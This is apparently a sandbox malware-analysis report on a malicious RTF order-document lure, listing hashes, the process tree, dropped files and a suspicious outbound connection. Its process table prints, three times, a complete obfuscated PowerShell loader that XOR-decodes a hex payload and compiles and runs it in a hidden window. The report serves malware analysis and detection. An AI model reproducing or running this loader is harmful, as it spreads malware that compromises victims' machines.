File name: | New Order PI-19-09878.doc |
Full analysis: | https://app.any.run/tasks/67c3213f-0814-4ad1-a7de-63829b7c09ce |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 09:27:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | C0C0FFEE3B19D5D587F6F0A60D6D8CA5 |
SHA1: | 89D7634DB765688A854039F28C6B978AC5218A0B |
SHA256: | 5D0293091090A578B74FD6ED813F4F0B9B8E895B5AF355B05ADD9A9722468EBA |
SSDEEP: | 1536:oZdMoLtGeCOZQmd1EJsgiAnEppBS1DMO8td7XS9qHlbKWiKoLtGeCOZQmd1EJsgb:oHMZ9qlrjZ9qlrjZ9qlrEtxS |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3572 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\New Order PI-19-09878.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1756 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
1212 | powershell -WindowStyle Hidden function u5cb7df { param($rdb369) $oe2cc8a = 'tdf42';$geaeed = ''; for ($i = 0; $i -lt $rdb369.length; $i+=2) { $g7722 = [convert]::ToByte($rdb369.Substring($i, 2), 16); $geaeed += [char]($g7722 -bxor $oe2cc8a[($i / 2) % $oe2cc8a.length]); } return $geaeed; } $w6d32 = '01170f5a5554371f474611095d41411d0a0114610d1712515f5a36135a461d09031a7b1a1003465d04370346441d0703470901170f5a5554371f4746110948705b1503085b41000d05470901170f5a5554371f47461109487d7d4f11155d5c1344354d4100010b1a7c11105d3938041104585b1744055853071746565141075f00000f3f22585e3d09165b40004c445f57060a03580146464a715c00161f645d1d0a12091033011264401b0727505606011547105d3946444716080f5712071007405b1744034c46111608147b1a10364040541e005554435c521c7b1a10364040540a500c0047481540401d0a01144a4001540d045d5f3d705e182d0b445d06104e1659111608515e4756441812310a12464b240b0f5a46545946167e1b0502785b161607464b564d3b144201060a5d5154171255461d0746514a0001145a123d0a1264460644030300105751551a0710145d5c134417075042004f0f6930080a7d5f040b14401a560f03465c11085506105844235a46061d365b5b1a105b16641d161241531834145b46110712161b2944164150180d0514410005125d5154011e4057060a46565d1b0846440b1552030c075c2d084062001646475043055e18673d0a1264460644115256115c4a14471d0a12144412575506531748465b470044135d5c004414500a4c065e501b4f3f22585e3d09165b40004c447f57060a035801464a02585e564846715c00161f645d1d0a12091026100a795d02012b515f1b161f161e543703407e1517127140060b140954150815511b2944154053000d0514570c1003465c5412095d565415020054104c2f5a46241014144a435c55075645482f5a462410141459425d555201580d0840121f025055035d5f164150180d0514410005125d51540d084012125d04050741504e1d493d0a126446064410550543055405124944030300105751551a015105560510024e160341545f0507410057570344545e0453564d4f0f5b124c105505430554050f492d0840620016486e57060b4f4f551b100914514d5d070609092d08406200164659061557530948120500030a404c105505430554051e015105560510024e160141545f05074100500503435453040a435252030346545404014052441d1b4f0d001c5f400555010f492d0840620016486e57060b4f4f551b100914514d5d07060909312f5a46241014145e1506520005494c337d5c003412461b415f135d5c0044170c0b4d515b04091d024e15424d0550510a414c0b005347514a5853165052031e441c52041e1b111214434c5d5f011b5d1f015b461b44050d0b15565d49700d10036f6f540251070112591d044a47554a044a12024a044a4d541b0f7b1a10364040540357525410515b795306170e555e5a250a585d172c21585d16050a1c015d5f2b5540070c07581c370b164d1a125355075458544a5303120202011e474d5d45564002021c5c1113467d5c003412461a19500707075a30097d5c0052521c1b5f541e040245064f1855450200500758574f0f514d5d0706085433035671180d035a46540f050604155c5b5a57034431515037080f515c004c4f0f4100160f5a55541c575205435d5f09771a120f465d1a09035a465a230340741b080251402405125c1a310a105d401b0a0b515c004a354457170d0758741b080251405a2516445e1d0707405b1b0a225546154d4d166e2803500d0b4355441f474107040356124c440153445557510745464f0f59175650550a5a2009435c180b0750741d08031c474107040356124c440551455457060640545e015040065301024555050004415253070315545600064150520c02415456000740065406054455020003415653020241540400014157441d1e0c550003054d5d4f0f62060b0551410737125540002d08525d5403025156155d5b5a57034436465d1701154761000514407b1a02091c4a450251030b4d4d5d64401b070347415a37125540004c01505710055f1d0906011241401a44560f4f041104585b1744154053000d05144100160f5a5554115357504300001c4100160f5a55541c050253404d1d4746060d0853121a525e060149461250544056440f4100160f5a555401510656475307096100160f5a555a210b44460d5f005b405c0d0840121d59560f5b481c050253404a2a515c13100e0f5b5f59541d49161d1251120e020752054c505b775d1a120346465a3009764b00014e4c514205521a6101061540401d0a011c5b58564f1803424d5d510546005503535f594e575a15164f1c48120500030a404438145c425c5407695c0d49061b5441465a044c56551a7e110a01405a294d5d4940111013465c54015106564753070f4f09'; $w6d322 = u5cb7df($w6d32); Add-Type -TypeDefinition $w6d322; [bc5c942]::f9b1554(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3276 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3944 | powershell -WindowStyle Hidden function u5cb7df { param($rdb369) $oe2cc8a = 'tdf42';$geaeed = ''; for ($i = 0; $i -lt $rdb369.length; $i+=2) { $g7722 = [convert]::ToByte($rdb369.Substring($i, 2), 16); $geaeed += [char]($g7722 -bxor $oe2cc8a[($i / 2) % $oe2cc8a.length]); } return $geaeed; } $w6d32 = '01170f5a5554371f474611095d41411d0a0114610d1712515f5a36135a461d09031a7b1a1003465d04370346441d0703470901170f5a5554371f4746110948705b1503085b41000d05470901170f5a5554371f47461109487d7d4f11155d5c1344354d4100010b1a7c11105d3938041104585b1744055853071746565141075f00000f3f22585e3d09165b40004c445f57060a03580146464a715c00161f645d1d0a12091033011264401b0727505606011547105d3946444716080f5712071007405b1744034c46111608147b1a10364040541e005554435c521c7b1a10364040540a500c0047481540401d0a01144a4001540d045d5f3d705e182d0b445d06104e1659111608515e4756441812310a12464b240b0f5a46545946167e1b0502785b161607464b564d3b144201060a5d5154171255461d0746514a0001145a123d0a1264460644030300105751551a0710145d5c134417075042004f0f6930080a7d5f040b14401a560f03465c11085506105844235a46061d365b5b1a105b16641d161241531834145b46110712161b2944164150180d0514410005125d5154011e4057060a46565d1b0846440b1552030c075c2d084062001646475043055e18673d0a1264460644115256115c4a14471d0a12144412575506531748465b470044135d5c004414500a4c065e501b4f3f22585e3d09165b40004c447f57060a035801464a02585e564846715c00161f645d1d0a12091026100a795d02012b515f1b161f161e543703407e1517127140060b140954150815511b2944154053000d0514570c1003465c5412095d565415020054104c2f5a46241014144a435c55075645482f5a462410141459425d555201580d0840121f025055035d5f164150180d0514410005125d51540d084012125d04050741504e1d493d0a126446064410550543055405124944030300105751551a015105560510024e160341545f0507410057570344545e0453564d4f0f5b124c105505430554050f492d0840620016486e57060b4f4f551b100914514d5d070609092d08406200164659061557530948120500030a404c105505430554051e015105560510024e160141545f05074100500503435453040a435252030346545404014052441d1b4f0d001c5f400555010f492d0840620016486e57060b4f4f551b100914514d5d07060909312f5a46241014145e1506520005494c337d5c003412461b415f135d5c0044170c0b4d515b04091d024e15424d0550510a414c0b005347514a5853165052031e441c52041e1b111214434c5d5f011b5d1f015b461b44050d0b15565d49700d10036f6f540251070112591d044a47554a044a12024a044a4d541b0f7b1a10364040540357525410515b795306170e555e5a250a585d172c21585d16050a1c015d5f2b5540070c07581c370b164d1a125355075458544a5303120202011e474d5d45564002021c5c1113467d5c003412461a19500707075a30097d5c0052521c1b5f541e040245064f1855450200500758574f0f514d5d0706085433035671180d035a46540f050604155c5b5a57034431515037080f515c004c4f0f4100160f5a55541c575205435d5f09771a120f465d1a09035a465a230340741b080251402405125c1a310a105d401b0a0b515c004a354457170d0758741b080251405a2516445e1d0707405b1b0a225546154d4d166e2803500d0b4355441f474107040356124c440153445557510745464f0f59175650550a5a2009435c180b0750741d08031c474107040356124c440551455457060640545e015040065301024555050004415253070315545600064150520c02415456000740065406054455020003415653020241540400014157441d1e0c550003054d5d4f0f62060b0551410737125540002d08525d5403025156155d5b5a57034436465d1701154761000514407b1a02091c4a450251030b4d4d5d64401b070347415a37125540004c01505710055f1d0906011241401a44560f4f041104585b1744154053000d05144100160f5a5554115357504300001c4100160f5a55541c050253404d1d4746060d0853121a525e060149461250544056440f4100160f5a555401510656475307096100160f5a555a210b44460d5f005b405c0d0840121d59560f5b481c050253404a2a515c13100e0f5b5f59541d49161d1251120e020752054c505b775d1a120346465a3009764b00014e4c514205521a6101061540401d0a011c5b58564f1803424d5d510546005503535f594e575a15164f1c48120500030a404438145c425c5407695c0d49061b5441465a044c56551a7e110a01405a294d5d4940111013465c54015106564753070f4f09'; $w6d322 = u5cb7df($w6d32); Add-Type -TypeDefinition $w6d322; [bc5c942]::f9b1554(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2772 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\wcu17jnx.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
576 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2056 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE3C9.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE3B9.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3260 | powershell -WindowStyle Hidden function u5cb7df { param($rdb369) $oe2cc8a = 'tdf42';$geaeed = ''; for ($i = 0; $i -lt $rdb369.length; $i+=2) { $g7722 = [convert]::ToByte($rdb369.Substring($i, 2), 16); $geaeed += [char]($g7722 -bxor $oe2cc8a[($i / 2) % $oe2cc8a.length]); } return $geaeed; } $w6d32 = '01170f5a5554371f474611095d41411d0a0114610d1712515f5a36135a461d09031a7b1a1003465d04370346441d0703470901170f5a5554371f4746110948705b1503085b41000d05470901170f5a5554371f47461109487d7d4f11155d5c1344354d4100010b1a7c11105d3938041104585b1744055853071746565141075f00000f3f22585e3d09165b40004c445f57060a03580146464a715c00161f645d1d0a12091033011264401b0727505606011547105d3946444716080f5712071007405b1744034c46111608147b1a10364040541e005554435c521c7b1a10364040540a500c0047481540401d0a01144a4001540d045d5f3d705e182d0b445d06104e1659111608515e4756441812310a12464b240b0f5a46545946167e1b0502785b161607464b564d3b144201060a5d5154171255461d0746514a0001145a123d0a1264460644030300105751551a0710145d5c134417075042004f0f6930080a7d5f040b14401a560f03465c11085506105844235a46061d365b5b1a105b16641d161241531834145b46110712161b2944164150180d0514410005125d5154011e4057060a46565d1b0846440b1552030c075c2d084062001646475043055e18673d0a1264460644115256115c4a14471d0a12144412575506531748465b470044135d5c004414500a4c065e501b4f3f22585e3d09165b40004c447f57060a035801464a02585e564846715c00161f645d1d0a12091026100a795d02012b515f1b161f161e543703407e1517127140060b140954150815511b2944154053000d0514570c1003465c5412095d565415020054104c2f5a46241014144a435c55075645482f5a462410141459425d555201580d0840121f025055035d5f164150180d0514410005125d51540d084012125d04050741504e1d493d0a126446064410550543055405124944030300105751551a015105560510024e160341545f0507410057570344545e0453564d4f0f5b124c105505430554050f492d0840620016486e57060b4f4f551b100914514d5d070609092d08406200164659061557530948120500030a404c105505430554051e015105560510024e160141545f05074100500503435453040a435252030346545404014052441d1b4f0d001c5f400555010f492d0840620016486e57060b4f4f551b100914514d5d07060909312f5a46241014145e1506520005494c337d5c003412461b415f135d5c0044170c0b4d515b04091d024e15424d0550510a414c0b005347514a5853165052031e441c52041e1b111214434c5d5f011b5d1f015b461b44050d0b15565d49700d10036f6f540251070112591d044a47554a044a12024a044a4d541b0f7b1a10364040540357525410515b795306170e555e5a250a585d172c21585d16050a1c015d5f2b5540070c07581c370b164d1a125355075458544a5303120202011e474d5d45564002021c5c1113467d5c003412461a19500707075a30097d5c0052521c1b5f541e040245064f1855450200500758574f0f514d5d0706085433035671180d035a46540f050604155c5b5a57034431515037080f515c004c4f0f4100160f5a55541c575205435d5f09771a120f465d1a09035a465a230340741b080251402405125c1a310a105d401b0a0b515c004a354457170d0758741b080251405a2516445e1d0707405b1b0a225546154d4d166e2803500d0b4355441f474107040356124c440153445557510745464f0f59175650550a5a2009435c180b0750741d08031c474107040356124c440551455457060640545e015040065301024555050004415253070315545600064150520c02415456000740065406054455020003415653020241540400014157441d1e0c550003054d5d4f0f62060b0551410737125540002d08525d5403025156155d5b5a57034436465d1701154761000514407b1a02091c4a450251030b4d4d5d64401b070347415a37125540004c01505710055f1d0906011241401a44560f4f041104585b1744154053000d05144100160f5a5554115357504300001c4100160f5a55541c050253404d1d4746060d0853121a525e060149461250544056440f4100160f5a555401510656475307096100160f5a555a210b44460d5f005b405c0d0840121d59560f5b481c050253404a2a515c13100e0f5b5f59541d49161d1251120e020752054c505b775d1a120346465a3009764b00014e4c514205521a6101061540401d0a011c5b58564f1803424d5d510546005503535f594e575a15164f1c48120500030a404438145c425c5407695c0d49061b5441465a044c56551a7e110a01405a294d5d4940111013465c54015106564753070f4f09'; $w6d322 = u5cb7df($w6d32); Add-Type -TypeDefinition $w6d322; [bc5c942]::f9b1554(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1500 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ph_0qbjg.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD13A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1756 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD91A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3276 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRDF25.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1212 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0DAJ02M47HQLW6CIQYFB.temp | — | |
MD5:— | SHA256:— | |||
576 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE2AF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2772 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCE3B9.tmp | — | |
MD5:— | SHA256:— | |||
2772 | csc.exe | C:\Users\admin\AppData\Local\Temp\wcu17jnx.pdb | — | |
MD5:— | SHA256:— | |||
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U38F8NRAJUFT7O6I1ZUL.temp | — | |
MD5:— | SHA256:— | |||
2056 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE3C9.tmp | — | |
MD5:— | SHA256:— | |||
2772 | csc.exe | C:\Users\admin\AppData\Local\Temp\wcu17jnx.dll | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1212 | powershell.exe | 35.225.200.121:80 | — | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
dns.msftncsi.com |
| shared |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|